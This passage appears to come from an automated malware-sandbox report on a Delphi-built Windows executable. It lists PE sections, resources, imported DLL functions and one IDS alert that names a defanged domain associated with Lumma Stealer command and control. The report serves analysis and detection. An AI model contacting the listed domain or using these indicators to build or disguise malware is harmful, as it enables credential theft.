IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
CODE	0x1000	0x144690	0x144800	00bd1870599878d9532ebb02c86c463f	False	0.5039920189714946	data	6.564023980749749	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
DATA	0x146000	0x4530	0x4600	6bd23cfd42470a69764b870fd2e71edd	False	0.42862723214285714	data	4.3120000686896995	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
BSS	0x14b000	0x4095	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x150000	0x2fa4	0x3000	26c2cbd9f6a8f4fe1bdadcd703f4f9b7	False	0.36572265625	data	5.0425606985241185	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x153000	0x10	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x154000	0x18	0x200	63ab5e836d7ca42436d0e1050971c21e	False	0.05078125	MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "e"	0.2069200177871819	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.reloc	0x155000	0x1521c	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.rsrc	0x16b000	0x99200	0x99200	59cfb43128e49ac411f6ac9275130585	False	0.4791374362244898	data	7.052090906631428	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0x16dc68	0x134	Targa image data - Map 64 x 65536 x 1 +32 "\001"			0.38636363636363635
RT_CURSOR	0x16dd9c	0x134	data			0.4642857142857143
RT_CURSOR	0x16ded0	0x134	data			0.4805194805194805
RT_CURSOR	0x16e004	0x134	data			0.38311688311688313
RT_CURSOR	0x16e138	0x134	data			0.36038961038961037
RT_CURSOR	0x16e26c	0x134	data			0.4090909090909091
RT_CURSOR	0x16e3a0	0x134	Targa image data - RGB 64 x 65536 x 1 +32 "\001"			0.4967532467532468
RT_CURSOR	0x16e4d4	0x134	Targa image data - Mono - RLE 64 x 65536 x 1 +32 "\001"	Russian	Russia	0.35714285714285715
RT_CURSOR	0x16e608	0x134	Targa image data - RLE 64 x 65536 x 1 +32 "\001"	Russian	Russia	0.35064935064935066
RT_CURSOR	0x16e73c	0x134	data	Russian	Russia	0.6038961038961039
RT_CURSOR	0x16e870	0x134	AmigaOS bitmap font "(", fc_YSize 4294935297, 3840 elements, 2nd "\200\003\377\201\300\007\377\203\300\017\377\003\340\037\376\007\360\037\370\017\370\003\300\037\374", 3rd	Russian	Russia	0.711038961038961
RT_CURSOR	0x16e9a4	0x134	Targa image data - Map - RLE 64 x 65536 x 1 +32 "\001"	English	United States	0.4837662337662338
RT_CURSOR	0x16ead8	0x134	Targa image data - Map - RLE 64 x 65536 x 1 +32 "\001"	English	United States	0.32142857142857145
RT_CURSOR	0x16ec0c	0x134	Targa image data - Mono 64 x 65536 x 1 +32 "\001"	English	United States	0.40584415584415584
RT_CURSOR	0x16ed40	0x134	data	Russian	Russia	0.44155844155844154
RT_CURSOR	0x16ee74	0x134	Targa image data 64 x 65536 x 1 +32 "\001"	Russian	Russia	0.5746753246753247
RT_CURSOR	0x16efa8	0x134	AmigaOS bitmap font "(", fc_YSize 4294966287, 3840 elements, 2nd "\376\017\340\377\377\017\341\377\377\217\343\377\377\337\367\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rd	Russian	Russia	0.4642857142857143
RT_CURSOR	0x16f0dc	0x134	data	Russian	Russia	0.3409090909090909
RT_CURSOR	0x16f210	0x134	Targa image data 64 x 65536 x 1 +32 "\001"	Russian	Russia	0.36038961038961037
RT_CURSOR	0x16f344	0x134	Targa image data 64 x 65536 x 1 +32 "\001"	Russian	Russia	0.3474025974025974
RT_CURSOR	0x16f478	0x134	AmigaOS bitmap font "(", fc_YSize 4294967040, 3840 elements, 2nd "\376", 3rd	Russian	Russia	0.4383116883116883
RT_CURSOR	0x16f5ac	0x134	Targa image data - Mono 64 x 65536 x 1 +32 "\001"	Russian	Russia	0.4512987012987013
RT_CURSOR	0x16f6e0	0x134	Targa image data - Mono 64 x 65536 x 1 +32 "\001"	Russian	Russia	0.39285714285714285
RT_CURSOR	0x16f814	0x134	Targa image data - Mono 64 x 65536 x 1 +32 "\001"	Russian	Russia	0.4967532467532468
RT_CURSOR	0x16f948	0x134	Targa image data - Map - RLE 64 x 65536 x 1 +32 "\001"	Russian	Russia	0.32142857142857145
RT_BITMAP	0x16fa7c	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.43103448275862066
RT_BITMAP	0x16fc4c	0x1e4	Device independent bitmap graphic, 36 x 19 x 4, image size 380			0.46487603305785125
RT_BITMAP	0x16fe30	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.43103448275862066
RT_BITMAP	0x170000	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.39870689655172414
RT_BITMAP	0x1701d0	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.4245689655172414
RT_BITMAP	0x1703a0	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.5021551724137931
RT_BITMAP	0x170570	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.5064655172413793
RT_BITMAP	0x170740	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.39655172413793105
RT_BITMAP	0x170910	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.5344827586206896
RT_BITMAP	0x170ae0	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.39655172413793105
RT_BITMAP	0x170cb0	0xc0	Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors			0.5208333333333334
RT_BITMAP	0x170d70	0xe0	Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors			0.42857142857142855
RT_BITMAP	0x170e50	0xe0	Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors			0.4955357142857143
RT_BITMAP	0x170f30	0x8c	Device independent bitmap graphic, 5 x 9 x 4, image size 36			0.5285714285714286
RT_BITMAP	0x170fbc	0xc8	Device independent bitmap graphic, 12 x 12 x 4, image size 96	Russian	Russia	0.41
RT_BITMAP	0x171084	0xc8	Device independent bitmap graphic, 12 x 12 x 4, image size 96	Russian	Russia	0.39
RT_BITMAP	0x17114c	0x8c	Device independent bitmap graphic, 5 x 9 x 4, image size 36			0.45
RT_BITMAP	0x1711d8	0x238	Device independent bitmap graphic, 29 x 29 x 4, image size 464			0.25
RT_BITMAP	0x171410	0x238	Device independent bitmap graphic, 29 x 29 x 4, image size 464			0.20950704225352113
RT_BITMAP	0x171648	0x8c	Device independent bitmap graphic, 5 x 9 x 4, image size 36			0.5071428571428571
RT_BITMAP	0x1716d4	0x8c	Device independent bitmap graphic, 5 x 9 x 4, image size 36			0.5142857142857142
RT_BITMAP	0x171760	0x8c	Device independent bitmap graphic, 5 x 9 x 4, image size 36			0.4857142857142857
RT_BITMAP	0x1717ec	0x238	Device independent bitmap graphic, 29 x 29 x 4, image size 464			0.21654929577464788
RT_BITMAP	0x171a24	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128			0.3232758620689655
RT_BITMAP	0x171b0c	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128			0.28448275862068967
RT_BITMAP	0x171bf4	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128			0.2629310344827586
RT_BITMAP	0x171cdc	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128			0.33189655172413796
RT_BITMAP	0x171dc4	0x4ac	Device independent bitmap graphic, 11 x 11 x 8, image size 132			0.4498327759197324
RT_BITMAP	0x172270	0x4ac	Device independent bitmap graphic, 11 x 11 x 8, image size 132			0.459866220735786
RT_BITMAP	0x17271c	0xc8	Device independent bitmap graphic, 17 x 8 x 4, image size 96			0.445
RT_BITMAP	0x1727e4	0xc8	Device independent bitmap graphic, 17 x 8 x 4, image size 96			0.44
RT_BITMAP	0x1728ac	0xc8	Device independent bitmap graphic, 17 x 8 x 4, image size 96			0.445
RT_BITMAP	0x172974	0xc8	Device independent bitmap graphic, 17 x 8 x 4, image size 96			0.445
RT_BITMAP	0x172a3c	0xc8	Device independent bitmap graphic, 17 x 8 x 4, image size 96			0.445
RT_BITMAP	0x172b04	0xc8	Device independent bitmap graphic, 17 x 8 x 4, image size 96			0.435
RT_BITMAP	0x172bcc	0xc8	Device independent bitmap graphic, 17 x 8 x 4, image size 96			0.445
RT_BITMAP	0x172c94	0x528	Device independent bitmap graphic, 16 x 16 x 8, image size 256			0.5280303030303031
RT_BITMAP	0x1731bc	0xe0	Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors			0.38392857142857145
RT_BITMAP	0x17329c	0xc0	Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors			0.4947916666666667
RT_BITMAP	0x17335c	0xc0	Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors			0.484375
RT_BITMAP	0x17341c	0x17ee0	Device independent bitmap graphic, 441 x 74 x 24, image size 97976	English	United States	0.2651403852432256
RT_BITMAP	0x18b2fc	0x18f0	Device independent bitmap graphic, 140 x 38 x 8, image size 5320, 256 important colors	English	United States	0.20269423558897243
RT_BITMAP	0x18cbec	0x2404	Device independent bitmap graphic, 180 x 17 x 24, image size 9180	English	United States	0.01984815618221258
RT_BITMAP	0x18eff0	0x2404	Device independent bitmap graphic, 180 x 17 x 24, image size 9180	English	United States	0.06995661605206074
RT_BITMAP	0x1913f4	0xa8	Device independent bitmap graphic, 6 x 16 x 4, image size 64, 16 important colors	English	United States	0.4880952380952381
RT_BITMAP	0x19149c	0xe0	Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors			0.42410714285714285
RT_BITMAP	0x19157c	0xc0	Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors			0.5104166666666666
RT_BITMAP	0x19163c	0xe0	Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors			0.5
RT_BITMAP	0x19171c	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128			0.4870689655172414
RT_BITMAP	0x191804	0xc0	Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors			0.4895833333333333
RT_BITMAP	0x1918c4	0xe0	Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors			0.3794642857142857
RT_ICON	0x1919a4	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2688, 256 important colors	English	United States	0.4925373134328358
RT_ICON	0x19284c	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1152, 256 important colors	English	United States	0.4223826714801444
RT_ICON	0x1930f4	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 320, 256 important colors	English	United States	0.2651734104046243
RT_ICON	0x19365c	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.18931535269709543
RT_ICON	0x195c04	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.28681988742964354
RT_ICON	0x196cac	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	English	United States	0.4920042643923241
RT_ICON	0x197b54	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	United States	0.41922382671480146
RT_ICON	0x1983fc	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	English	United States	0.26372832369942195
RT_ICON	0x198964	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	English	United States	0.528179190751445
RT_ICON	0x198ecc	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	English	United States	0.5101156069364162
RT_ICON	0x199434	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	English	United States	0.5122832369942196
RT_ICON	0x19999c	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	English	United States	0.5187861271676301
RT_ICON	0x199f04	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	English	United States	0.5202312138728323
RT_ICON	0x19a46c	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.3723404255319149
RT_DIALOG	0x19a8d4	0x52	data			0.7682926829268293
RT_STRING	0x19a928	0x25c	data			0.48013245033112584
RT_STRING	0x19ab84	0x29c	data			0.44610778443113774
RT_STRING	0x19ae20	0x190	data			0.4875
RT_STRING	0x19afb0	0x18c	AmigaOS bitmap font "m", fc_YSize 29184, 18688 elements, 2nd "s", 3rd			0.5277777777777778
RT_STRING	0x19b13c	0x2a8	data			0.43823529411764706
RT_STRING	0x19b3e4	0x8a0	data			0.3179347826086957
RT_STRING	0x19bc84	0x378	data			0.4166666666666667
RT_STRING	0x19bffc	0x134	data			0.5876623376623377
RT_STRING	0x19c130	0x4dc	data			0.27733118971061094
RT_STRING	0x19c60c	0x36c	data			0.3812785388127854
RT_STRING	0x19c978	0x1a0	data			0.5
RT_STRING	0x19cb18	0x1c4	data			0.42035398230088494
RT_STRING	0x19ccdc	0x2c0	data			0.3196022727272727
RT_STRING	0x19cf9c	0x358	data			0.4182242990654206
RT_STRING	0x19d2f4	0x4a8	data			0.32466442953020136
RT_STRING	0x19d79c	0x504	data			0.3333333333333333
RT_STRING	0x19dca0	0x500	data			0.34296875
RT_STRING	0x19e1a0	0x1e4	data			0.38016528925619836
RT_STRING	0x19e384	0x1a4	data			0.4714285714285714
RT_STRING	0x19e528	0x11c	data			0.5880281690140845
RT_STRING	0x19e644	0x3ec	StarOffice Gallery theme l, 1677748480 objects, 1st l			0.41733067729083667
RT_STRING	0x19ea30	0xc0	data			0.609375
RT_STRING	0x19eaf0	0x104	data			0.573076923076923
RT_STRING	0x19ebf4	0x168	data			0.5277777777777778
RT_STRING	0x19ed5c	0x480	data			0.3671875
RT_STRING	0x19f1dc	0x390	data			0.3684210526315789
RT_STRING	0x19f56c	0x388	data			0.36504424778761063
RT_STRING	0x19f8f4	0x34c	data			0.3518957345971564
RT_STRING	0x19fc40	0x3bc	data			0.39435146443514646
RT_STRING	0x19fffc	0xf4	data			0.47540983606557374
RT_STRING	0x1a00f0	0xc4	data			0.5663265306122449
RT_STRING	0x1a01b4	0x2c0	data			0.4446022727272727
RT_STRING	0x1a0474	0x420	data			0.32007575757575757
RT_STRING	0x1a0894	0x330	data			0.3639705882352941
RT_STRING	0x1a0bc4	0x314	data			0.34390862944162437
RT_RCDATA	0x1a0ed8	0x10	data			1.5
RT_RCDATA	0x1a0ee8	0x9b8	data			0.6157556270096463
RT_RCDATA	0x1a18a0	0x2f66	Delphi compiled form 'TdxBarCustomizingForm'			0.2567166639195649
RT_RCDATA	0x1a4808	0x4b0	Delphi compiled form 'TdxBarItemAddEditor'			0.4608333333333333
RT_RCDATA	0x1a4cb8	0x287	Delphi compiled form 'TdxBarNameEd'			0.6058732612055642
RT_RCDATA	0x1a4f40	0x171	Delphi compiled form 'TdxBarSubMenuEditor'			0.7100271002710027
RT_RCDATA	0x1a50b4	0x46d	Delphi compiled form 'TfAboutDlg'			0.5145631067961165
RT_RCDATA	0x1a5524	0x390	Delphi compiled form 'TfErrorLogDlg'			0.5964912280701754
RT_RCDATA	0x1a58b4	0x6179	Delphi compiled form 'TfFeedStationMain'			0.3395182943934597
RT_RCDATA	0x1aba30	0xa26	Delphi compiled form 'TfOpenUrlDlg'			0.8160123171670516
RT_RCDATA	0x1ac458	0x519c	Delphi compiled form 'TfOptionsDlg'			0.200124449550067
RT_RCDATA	0x1b15f4	0x81a	Delphi compiled form 'TfProxyDlg'			0.38235294117647056
RT_RCDATA	0x1b1e10	0x49c	Delphi compiled form 'TfrmAddGroupItems'			0.4610169491525424
RT_RCDATA	0x1b22ac	0x2e0	Delphi compiled form 'TfSyncProgressDlg'			0.6046195652173914
RT_RCDATA	0x1b258c	0x403	Delphi compiled form 'TSxExtendedExceptionInfoWindow'			0.5131450827653359
RT_GROUP_CURSOR	0x1b2990	0x14	data			1.4
RT_GROUP_CURSOR	0x1b29a4	0x14	data			1.4
RT_GROUP_CURSOR	0x1b29b8	0x14	data			1.4
RT_GROUP_CURSOR	0x1b29cc	0x14	data			1.4
RT_GROUP_CURSOR	0x1b29e0	0x14	data			1.4
RT_GROUP_CURSOR	0x1b29f4	0x14	data			1.4
RT_GROUP_CURSOR	0x1b2a08	0x14	data			1.4
RT_GROUP_CURSOR	0x1b2a1c	0x14	data			1.4
RT_GROUP_CURSOR	0x1b2a30	0x14	data			1.4
RT_GROUP_CURSOR	0x1b2a44	0x14	data			1.4
RT_GROUP_CURSOR	0x1b2a58	0x14	data			1.4
RT_GROUP_CURSOR	0x1b2a6c	0x14	data			1.4
RT_GROUP_CURSOR	0x1b2a80	0x14	data			1.4
RT_GROUP_CURSOR	0x1b2a94	0x14	data			1.4
RT_GROUP_CURSOR	0x1b2aa8	0x14	data			1.4
RT_GROUP_CURSOR	0x1b2abc	0x14	data			1.4
RT_GROUP_CURSOR	0x1b2ad0	0x14	data			1.4
RT_GROUP_CURSOR	0x1b2ae4	0x14	data			1.4
RT_GROUP_CURSOR	0x1b2af8	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.25
RT_GROUP_CURSOR	0x1b2b0c	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.25
RT_GROUP_CURSOR	0x1b2b20	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.3
RT_GROUP_CURSOR	0x1b2b34	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.3
RT_GROUP_CURSOR	0x1b2b48	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.3
RT_GROUP_CURSOR	0x1b2b5c	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.3
RT_GROUP_CURSOR	0x1b2b70	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.3
RT_GROUP_ICON	0x1b2b84	0x30	data	English	United States	0.9166666666666666
RT_GROUP_ICON	0x1b2bb4	0x14	data	English	United States	1.25
RT_GROUP_ICON	0x1b2bc8	0x14	data	English	United States	1.25
RT_GROUP_ICON	0x1b2bdc	0x14	data	English	United States	1.25
RT_GROUP_ICON	0x1b2bf0	0x14	data	English	United States	1.25
RT_GROUP_ICON	0x1b2c04	0x14	data	English	United States	1.25
RT_GROUP_ICON	0x1b2c18	0x5a	data	English	United States	0.6555555555555556
RT_VERSION	0x1b2c74	0x238	data	English	United States	0.5440140845070423
RT_MANIFEST	0x1b2eac	0x245	XML 1.0 document, ASCII text, with CRLF line terminators			0.5249569707401033

Imports

DLL	Import
kernel32.dll	DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, ExitThread, CreateThread, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
user32.dll	GetKeyboardType, LoadStringA, MessageBoxA, CharNextA
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegCloseKey
oleaut32.dll	SysFreeString, SysReAllocStringLen, SysAllocStringLen
kernel32.dll	TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
advapi32.dll	RegSetValueExA, RegQueryValueExA, RegQueryInfoKeyA, RegOpenKeyExA, RegFlushKey, RegEnumKeyExA, RegDeleteValueA, RegDeleteKeyA, RegCreateKeyExA, RegCloseKey
kernel32.dll	lstrcpyA, lstrcmpA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualFree, VirtualAlloc, TerminateProcess, SwitchToThread, SuspendThread, Sleep, SizeofResource, SetThreadPriority, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResumeThread, ResetEvent, ReleaseMutex, ReadFile, OpenProcess, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalSize, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetUserDefaultLCID, GetTimeZoneInformation, GetTickCount, GetThreadLocale, GetTempPathA, GetSystemInfo, GetStringTypeExA, GetStdHandle, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetFileAttributesA, GetExitCodeThread, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetComputerNameA, GetCommandLineA, GetCPInfo, GetACP, FreeResource, InterlockedIncrement, InterlockedExchange, InterlockedDecrement, FreeLibrary, FormatMessageA, FindResourceA, FindNextFileA, FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime, EnumCalendarInfoA, EnterCriticalSection, DeleteFileA, DeleteCriticalSection, CreateThread, CreateProcessA, CreateMutexA, CreateFileA, CreateEventA, CreateDirectoryA, CopyFileA, CompareStringA, CloseHandle
version.dll	VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
gdi32.dll	UpdateColors, UnrealizeObject, StretchDIBits, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SelectClipRgn, SaveDC, RoundRect, RestoreDC, Rectangle, RectVisible, RealizePalette, PtInRegion, Polyline, Polygon, PolyPolyline, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPointA, GetTextExtentPoint32A, GetTextExtentExPointA, GetTextColor, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectType, GetObjectA, GetNearestColor, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileDescriptionA, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetCurrentObject, GetClipRgn, GetClipBox, GetBrushOrgEx, GetBkMode, GetBitmapBits, GdiFlush, FrameRgn, ExtTextOutA, ExtSelectClipRgn, ExcludeClipRect, Ellipse, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreateRectRgnIndirect, CreateRectRgn, CreatePolygonRgn, CreatePenIndirect, CreatePen, CreatePatternBrush, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateEnhMetaFileA, CreateEllipticRgn, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, CombineRgn, CloseEnhMetaFile, BitBlt
user32.dll	CreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, WaitForInputIdle, VkKeyScanA, ValidateRect, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, ShowCaret, SetWindowRgn, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRectEmpty, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClipboardData, SetClassLongA, SetCapture, SetActiveWindow, SendNotifyMessageA, SendMessageTimeoutA, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OpenClipboard, OffsetRect, OemToCharA, MsgWaitForMultipleObjects, MessageBoxW, MessageBoxA, MessageBeep, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsClipboardFormatAvailable, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, HideCaret, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessageTime, GetMessagePos, GetMessageA, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenuDefaultItem, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDlgItem, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassLongA, GetClassInfoA, GetCaretPos, GetCapture, GetAsyncKeyState, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumClipboardFormats, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, EmptyClipboard, DrawTextExA, DrawTextW, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DragDetect, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, CopyImage, CopyIcon, CloseClipboard, ClientToScreen, ChildWindowFromPointEx, ChildWindowFromPoint, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
kernel32.dll	Sleep
oleaut32.dll	SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
ole32.dll	CreateStreamOnHGlobal, IsAccelerator, ReleaseStgMedium, OleDraw, OleSetMenuDescriptor, RevokeDragDrop, RegisterDragDrop, OleUninitialize, OleInitialize, CoTaskMemFree, CoTaskMemAlloc, CLSIDFromProgID, ProgIDFromCLSID, StringFromCLSID, CoCreateInstance, CoGetClassObject, CoUninitialize, CoInitialize, IsEqualGUID
oleaut32.dll	CreateErrorInfo, GetErrorInfo, SetErrorInfo, GetActiveObject, SysFreeString
olepro32.dll	OleLoadPicture
comctl32.dll	ImageList_Duplicate, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_GetIcon, ImageList_Remove, ImageList_DrawEx, ImageList_Replace, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls
shell32.dll	Shell_NotifyIconA, ShellExecuteExA, ShellExecuteA, SHGetFileInfoA, SHFileOperationA, DragQueryPoint, DragQueryFileA
wininet.dll	InternetSetOptionA, InternetReadFile, InternetOpenA, InternetErrorDlg, InternetCrackUrlA, InternetConnectA, InternetCloseHandle, HttpSendRequestA, HttpQueryInfoA, HttpOpenRequestA
URLMON.DLL	CoInternetCombineUrl
shell32.dll	SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHGetMalloc, SHBrowseForFolderA
comdlg32.dll	GetSaveFileNameA, GetOpenFileNameA
winmm.dll	PlaySoundA

Possible Origin

Language of compilation system	Country where language is spoken	Map
Russian	Russia
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-10T11:59:13.442100+0100	2058612	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ingreem-eilish .biz)	1	192.168.2.5	56548	1.1.1.1	53	UDP
